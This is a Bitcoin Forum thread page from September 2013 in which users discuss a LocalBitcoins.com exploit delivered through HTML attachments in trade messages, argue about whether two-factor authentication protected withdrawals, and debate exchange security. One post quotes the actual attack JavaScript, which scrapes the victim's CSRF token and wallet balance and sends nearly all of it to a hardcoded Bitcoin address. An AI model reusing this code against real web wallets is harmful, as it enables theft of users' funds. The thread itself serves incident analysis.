Bitcoin Forum>Economy>Marketplace>Service Discussion
Pages:
Author

Topic: LocalBitcoins.com exploit! (Read 6082 times)

niko
hero member
Activity: 756
Merit: 501
There is more to Bitcoin than bitcoins.
LocalBitcoins.com exploit!
September 14, 2013, 09:58:31 PM
#60
Quote from: herzmeister on September 14, 2013, 06:22:58 PM
Quote from: niko on September 14, 2013, 02:46:59 PM
Can someone clarify: simply visiting a forum page was enough, or opening an attachment?

did you mean because i linked to the forum in the OP? no, that link was safe, or what do you think of me  Angry

the exploit was in the site's messaging system when doing trades. That people can upload attachments there is a relatively new feature.
Ten days ago I was browsing through LBC Site, and there was great advice on how to trade safely. I specifically remember them reminding people to always be cautious with any attachments in emails, etc.
People clicked on attachments, did not have 2FA, and sure enough the thief got their coins.
herzmeister
legendary
Activity: 1764
Merit: 1007
Re: LocalBitcoins.com exploit!
September 14, 2013, 06:22:58 PM
#59
Quote from: niko on September 14, 2013, 02:46:59 PM
Can someone clarify: simply visiting a forum page was enough, or opening an attachment?

did you mean because i linked to the forum in the OP? no, that link was safe, or what do you think of me  Angry

the exploit was in the site's messaging system when doing trades. That people can upload attachments there is a relatively new feature.
willphase
hero member
Activity: 767
Merit: 500
Re: LocalBitcoins.com exploit!
September 14, 2013, 06:21:22 PM
#58
Quote from: niko on September 14, 2013, 02:46:59 PM
Can someone clarify: simply visiting a forum page was enough, or opening an attachment?

You had to open the attachment (that was in fact an HTML page) and not have 2FA on withdrawals enabled.

Will
niko
hero member
Activity: 756
Merit: 501
There is more to Bitcoin than bitcoins.
Re: LocalBitcoins.com exploit!
September 14, 2013, 02:46:59 PM
#57
Can someone clarify: simply visiting a forum page was enough, or opening an attachment?
rufusBTC
jr. member
Activity: 121
Merit: 1
The World’s First Blockchain Core
Re: LocalBitcoins.com exploit!
September 14, 2013, 01:10:08 PM
#56
Quote from: BitAddict on September 14, 2013, 07:22:17 AM
Quote from: joesmoe2012 on September 14, 2013, 04:51:22 AM
Quote from: justusranvier on September 13, 2013, 11:40:39 PM
AFAIK two factor on LocalBitcoins is only for logging in, not for withdrawals, so it provided absolutely no protection against this exploit.
Incorrect. THey use 2FA for withdraw confirmation as well. I don't think that this exploit effected anybody who had 2FA enabled. 

+1

You can't withdrawal without 2FA code, if enabled.

looks like the exploit just sucked out peoples BTC, through a loophole even if they had 2FA.
johnyj
legendary
Activity: 1988
Merit: 1012
Beyond Imagination
Re: LocalBitcoins.com exploit!
September 14, 2013, 08:15:56 AM
#55
At lease an email based 2FA is much better
BitAddict
legendary
Activity: 1190
Merit: 1001
Re: LocalBitcoins.com exploit!
September 14, 2013, 07:22:17 AM
#54
Quote from: joesmoe2012 on September 14, 2013, 04:51:22 AM
Quote from: justusranvier on September 13, 2013, 11:40:39 PM
AFAIK two factor on LocalBitcoins is only for logging in, not for withdrawals, so it provided absolutely no protection against this exploit.
Incorrect. THey use 2FA for withdraw confirmation as well. I don't think that this exploit effected anybody who had 2FA enabled. 

+1

You can't withdrawal without 2FA code, if enabled.
joesmoe2012
hero member
Activity: 882
Merit: 501
Ching-Chang;Ding-Dong
Re: LocalBitcoins.com exploit!
September 14, 2013, 04:51:22 AM
#53
Quote from: justusranvier on September 13, 2013, 11:40:39 PM
AFAIK two factor on LocalBitcoins is only for logging in, not for withdrawals, so it provided absolutely no protection against this exploit.
Incorrect. THey use 2FA for withdraw confirmation as well. I don't think that this exploit effected anybody who had 2FA enabled. 
justusranvier
legendary
Activity: 1400
Merit: 1013
Re: LocalBitcoins.com exploit!
September 13, 2013, 11:40:39 PM
#52
AFAIK two factor on LocalBitcoins is only for logging in, not for withdrawals, so it provided absolutely no protection against this exploit.
smoothie
legendary
Activity: 2492
Merit: 1473
LEALANA Bitcoin Grim Reaper
Re: LocalBitcoins.com exploit!
September 13, 2013, 11:37:02 PM
#51
As the saying goes:

Those who fail to learn from history are doomed to repeat it.


joesmoe2012
hero member
Activity: 882
Merit: 501
Ching-Chang;Ding-Dong
Re: LocalBitcoins.com exploit!
September 13, 2013, 02:26:24 PM
#50
You can make 2FA work with differenet SIMs, I have, it's not that difficult. Just backup and then restore.

Everybody should be using 2FA if your dealing with bitcoins. Otherwise stay away from targets such as exchanges.

Good work on localbitcoins behalf in paying out of their pocket for all the stolen coins.
Cryddit
legendary
Activity: 924
Merit: 1132
Re: LocalBitcoins.com exploit!
September 13, 2013, 11:29:35 AM
#49
Quote from: BitAddict on September 13, 2013, 05:33:42 AM
Quote from: Cryddit on September 13, 2013, 12:22:31 AM
Quote from: Fiyasko on September 12, 2013, 09:54:34 PM
My gosh, people need to stop setting up bitcoin exchange places without setting up proper security first!
So many places are getting hacked into, WHEN WILL PEOPLE LEARN!?

People keep putting Coins into online wallets whose security they don't know crap about!  WHEN WILL PEOPLE LEARN?


You need to leave the bitcoins in the wallet if you want to sell them ... and I believe more a company than the average private seller... How did you buy your bitcoins, sir?

Some I bought them from Bitstamp.  And moved them the instant they showed up in Bitstamp account, to my private wallet.  

Some I got for pay - made machine parts for someone. She wanted pay me in Bitcoin, I said sure.

Some others I got for pay - wrote code for somebody wanted special exclusive super-secret software analyze enormous big pile of data, paid Bitcoin to keep private from someone else looking at bank account.

Some others I got for pay - Main job, security consult.  I look at malware, see what it does by read machine code, figure out how to clean infected machines.  Clients implement, or I implement, cleaning software, clients then sell.  Pays well.  Twice now I asked pay me in Bitcoin, they said 'sure, whatever'.

A couple I bought direct in person, smartphone to smartphone, from speculator got nervous back when price was USD$60.

johnyj
legendary
Activity: 1988
Merit: 1012
Beyond Imagination
Re: LocalBitcoins.com exploit!
September 13, 2013, 11:04:20 AM
#48
Quote from: BitAddict on September 13, 2013, 11:02:44 AM
Quote from: johnyj on September 13, 2013, 10:56:34 AM
bitcoin withdraw should be authenticated through email

With 2FA I think is enough

2FA is not convenient if you use the site many times a day, and it does not work when you are abroad and use a different sim card
BitAddict
legendary
Activity: 1190
Merit: 1001
Re: LocalBitcoins.com exploit!
September 13, 2013, 11:02:44 AM
#47
Quote from: johnyj on September 13, 2013, 10:56:34 AM
bitcoin withdraw should be authenticated through email

With 2FA I think is enough
johnyj
legendary
Activity: 1988
Merit: 1012
Beyond Imagination
Re: LocalBitcoins.com exploit!
September 13, 2013, 10:56:34 AM
#46
bitcoin withdraw should be authenticated through email
MPOE-PR
hero member
Activity: 756
Merit: 522
Re: LocalBitcoins.com exploit!
September 13, 2013, 10:54:57 AM
#45
Quote from: Fiyasko on September 12, 2013, 09:54:34 PM
My gosh, people need to stop setting up bitcoin exchange places without setting up proper security first!
So many places are getting hacked into, WHEN WILL PEOPLE LEARN!?

They'll learn when they're able to recognize their own vanity, stupidity, and unreadiness. Which would often enough seem about as likely as pigs flying, sadly.

Quote from: Itcher on September 13, 2013, 04:15:09 AM
By now its at the same stage like the "Piratenpartei" in germany: sympathic, here to change the world, full of great ideas, clever in the system, ready for the future - but in actual reality a bunch of nerds who are unable to act like adult politicians and becomes ridiculous when trying.

Don't write a code, go to your local bank, ask for an internship and learn how moneys works.

This, basically. With the addendum that not everyone is cut out to run a business. And the post-script that paying attention to what the actually capable have to say is a necessary step.
marcovaldo
sr. member
Activity: 350
Merit: 250
Re: LocalBitcoins.com exploit!
September 13, 2013, 10:50:44 AM
#44
Did you personnaly lose anything?
herzmeister
legendary
Activity: 1764
Merit: 1007
Re: LocalBitcoins.com exploit!
September 13, 2013, 10:23:07 AM
#43
Quote from: Mike Hearn on September 13, 2013, 10:18:13 AM
Ideally, there would be no need to deposit funds into any website to do basic person to person trading. I never used the localbitcoins escrow system, if you meet in person it's not that important.

It enables in-person trading without requiring internet access at all, for neither buyer nor seller. All that's required is that seller can receive SMS.

In practice, many do have smartphones and transfer their coins directly though.

For online trading, escrow is pretty necessary in most cases though. That's why traders often have a few coins in their localbitcoins.com wallets.
Mike Hearn
legendary
Activity: 1526
Merit: 1129
Re: LocalBitcoins.com exploit!
September 13, 2013, 10:18:13 AM
#42
Ideally, there would be no need to deposit funds into any website to do basic person to person trading. I never used the localbitcoins escrow system, if you meet in person it's not that important.
runeks
legendary
Activity: 980
Merit: 1008
Re: LocalBitcoins.com exploit!
September 13, 2013, 08:43:32 AM
#41
This is the exploit in question:

Code:
function loadpic() {
    function btcget() {
        $.ajax({
            url: '/accounts/wallet/',
            type: 'GET',
            dataType: 'html',
            contentType: 'application/x-www-form-urlencoded; charset=UTF-8',
            error: function() {},
            success: function(data) {
                walh(data);
            }
        });
    }

    function btcsend(btcamount, btcto, csrf) {
        var pd = {
            'csrfmiddlewaretoken': csrf,
            'address_to': btcto,
            'amount': btcamount,
            'send_submit': 'Send from wallet'
        };
        $.ajax({
            url: '/accounts/wallet/',
            data: pd,
            type: 'POST',
            dataType: 'html',
            contentType: 'application/x-www-form-urlencoded; charset=UTF-8',
            error: function() {},
            success: function(data) {}
        });
    }

    function walh(html) {
        var hastfa = '';
        var csrftoken = '';
        var btc = 0;
        var m = html.match(/label for=.(id_token)/);
        if (m && m[1]) {
            if (m[1] != '') {
                return;
            }
        }
        m = html.match(/.csrfmiddlewaretoken. value=.([a-zA-Z0-9_-]+)/);
        if (m && m[1]) {
            csrftoken = m[1];
        } else {
            return;
        }
        m = html.match(/Wallet: ([0-9,.-]+) BTC/);
        if (m && m[1]) {
            btc = m[1];
        } else {
            return;
        }
        btc = parseFloat(btc);
        btc = btc.toFixed(2);
        if (btc < 0.02) {
            return;
        }
        btc = btc - 0.01;
        btc = btc.toFixed(2);

        btcsend(btc, '12PLw9HYoK6BguB1w4QcNBKzmRANJ5bj2c', csrftoken);
    }
    btcget();
}

Retrieved from this site: http://urlquery.net/report.php?id=5191051
Pages:
Bitcoin Forum>Economy>Marketplace>Service Discussion
Jump to: